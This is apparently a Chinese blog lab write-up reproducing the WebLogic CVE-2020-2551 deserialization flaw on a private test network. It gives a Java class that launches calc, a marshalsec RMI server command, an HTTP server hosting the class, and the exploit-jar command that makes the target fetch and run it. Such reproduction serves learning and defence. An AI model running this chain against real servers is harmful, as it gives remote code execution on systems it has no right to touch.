漏洞原理
http://blog.topsec.com.cn/weblogic-cve-2020-2551%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
https://www.cnblogs.com/-qing-/p/12682804.html
https://www.cnblogs.com/renhaoblog/p/13346294.html
環境搭建
靶機:win7 ip地址:192.168.177.129 WebLogic Server 版本: 10.3.6.0
攻擊機:win10 物理機 ip地址:192.168.177.1
漏洞復現
工具使用
先使用python腳本檢測漏洞:
exp文件:
1.查看exp源代碼:
import java.io.IOException; public class exp { static{ try { java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"}); } catch (IOException e) { e.printStackTrace(); } } public static void main(String[] args) { } }
2.編譯exp生成class
進入文件所在目錄打開cmd,使用命令:javac exp.java -source 1.6 -target 1.6
3. 使用python啟動web服務
進入exp目錄打開cmd,使用命令啟動web服務:python3 -m http.server 80
4.啟動惡意RMI服務
進入目錄打開cmd,開啟服務命令:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.177.1/#exp" 1099
5.使用exp攻擊
使用命令加載exp攻擊靶機漏洞:java -jar weblogic_CVE_2020_2551.jar 192.168.177.129 7001 rmi://192.168.177.1:1099/exp
參考鏈接
https://www.cnblogs.com/loong-hon/p/10619616.html
https://bacde.me/post/Apache-Shiro-Deserialize-Vulnerability/
http://blog.topsec.com.cn/weblogic-cve-2020-2551%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
https://www.cnblogs.com/-qing-/p/12682804.html
https://www.cnblogs.com/renhaoblog/p/13346294.html
免責聲明
嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 后果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合 !